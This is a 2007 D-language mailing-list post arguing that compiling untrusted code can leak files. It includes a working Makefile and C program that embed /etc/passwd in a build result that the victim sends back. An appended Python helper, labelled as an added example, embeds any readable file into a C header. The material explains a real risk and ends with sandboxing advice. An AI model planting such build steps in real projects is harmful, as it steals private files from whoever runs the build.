DMD 1.005 release [security concerns about ImportExpressions]

Yauheni Akhotnikau eao197 at intervale.ru
Tue Feb 13 02:39:22 PST 2007


On Wed, 07 Feb 2007 09:30:31 +0300, Vladimir Panteleev  
<thecybershadow at gmail.com> wrote:

> On Tue, 06 Feb 2007 06:54:18 +0200, Walter Bright  
> <newshound at digitalmars.com> wrote:
>
>> http://www.digitalmars.com/d/changelog.html
>
> Hmm. What would prevent someone from writing programs like:
>    writef(import("/etc/passwd"));
> and trick someone to compile this program for them (under the pretext  
> that they don't have a D compiler, for example) to steal the user list  
> (or the contents of any other file with a known absolute or relative  
> path on the victim's system)?

I don't think that preventing the inclusion of private data during  
compilation is a task for the D compiler. That private data can be stolen even  
without the new import expression -- it is only necessary to have ordinary Unix  
utilities and make available. Consider the following sample:

=== Makefile ===
grab_password: grab_password.c file_content.h
	gcc -o grab_password grab_password.c

# Wrap /etc/passwd in a C string literal: uuencode keeps it printable,
# the first two seds escape backslashes and double quotes, the third
# appends "\n" plus a line-continuation backslash to every line.
# printf is used instead of echo because some shells' echo mangle a
# trailing backslash.
file_content.h: Makefile
	printf '%s\n' 'const char file_content[] = "\' > file_content.h
	uuencode /etc/passwd password-info | sed 's/\\/\\\\/g' | sed 's/"/\\"/g' | sed 's/^\(.*\)/\1\\n\\/' >> file_content.h
	printf '%s\n' '";' >> file_content.h

=== grab_password.c ===
#include <stdio.h>

/* generated by the Makefile above; holds the uuencoded /etc/passwd */
#include "file_content.h"

int main(void)
{
	/* the "build result" the victim sends back carries the file */
	printf( "file content is: %s\n", file_content );
	return 0;
}

If someone sent these two files to you and asked you to compile them and return  
the result, you would send your password without knowing about it.

And things are yet more interesting -- many projects use build tools that are  
built on top of dynamic languages (SCons uses Python, Rake and Mxx_ru use  
Ruby, MPC (from ACE) uses Perl for generating makefiles, OpenSSL uses Perl  
for configuration (at least on the MSWin platform)). In such a situation the  
build script can grab whatever it wants without telling you a word.

-- 
Regards,
Yauheni Akhotnikau
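The same trick done from a Python-based build step, as an added example that is not part of the original post and not SCons's own code: a helper that any SConstruct, setup.py or similar script could call to read a file the build user can access and bake it into a C translation unit. It generalizes the uuencode/sed pipeline above by escaping every byte itself (octal rather than \x, because a \x escape greedily eats following hex digits), so binary files survive too. The file name, symbol name and sample contents below are constructed for the example.

```python
"""Build-time file exfiltration from a Python build script (added example).

A build tool written in a dynamic language can open any file the build
user can read. These helpers turn such a file into a C string literal so
the compiled "result" the victim sends back carries the file's contents.
"""
import os
import tempfile


def c_escape_bytes(data: bytes, width: int = 16) -> str:
    """Render raw bytes as adjacent C string literals, `width` bytes per line.

    Printable ASCII other than backslash, double quote and question mark is
    emitted as-is; everything else becomes a three-digit octal escape.
    Octal is used instead of \\x because "\\x01ab" would be parsed as one
    escape \\x01ab, while "\\001ab" is always byte 1 followed by 'a', 'b'.
    """
    lines = []
    for i in range(0, len(data), width):
        chunk = data[i:i + width]
        parts = []
        for b in chunk:
            if 0x20 <= b < 0x7F and b not in (0x22, 0x3F, 0x5C):  # " ? \
                parts.append(chr(b))
            else:
                parts.append("\\%03o" % b)
        lines.append('"' + "".join(parts) + '"')
    return "\n".join(lines) if lines else '""'


def render_header(symbol: str, data: bytes) -> str:
    """Text of a header defining `symbol` as a byte array plus its length."""
    body = c_escape_bytes(data)
    return (
        "/* generated at build time; do not edit */\n"
        f"static const char {symbol}[] =\n{body};\n"
        f"static const unsigned long {symbol}_len = {len(data)}UL;\n"
    )


def embed_file(src_path: str, out_path: str, symbol: str) -> int:
    """Read src_path (any readable file) into out_path as C; return byte count.

    In a real SConstruct this would be called from a Builder or Command
    step with src_path set to "/etc/passwd" or any other interesting path.
    """
    with open(src_path, "rb") as f:
        data = f.read()
    with open(out_path, "w") as out:
        out.write(render_header(symbol, data))
    return len(data)


if __name__ == "__main__":
    # Stand-alone demo on a constructed stand-in for /etc/passwd so it runs
    # offline without touching the real file.
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "passwd")
        with open(victim, "wb") as f:
            f.write(b"root:x:0:0:root:/root:/bin/sh\n")
        header = os.path.join(tmp, "file_content.h")
        n = embed_file(victim, header, "file_content")
        with open(header) as f:
            print(f"embedded {n} bytes:\n{f.read()}")
```

The practical consequence is the one the post draws: compiling (or even just running the build script of) untrusted sources is equivalent to running the author's code with your privileges, so do it in a throwaway container or VM that has no access to files you care about.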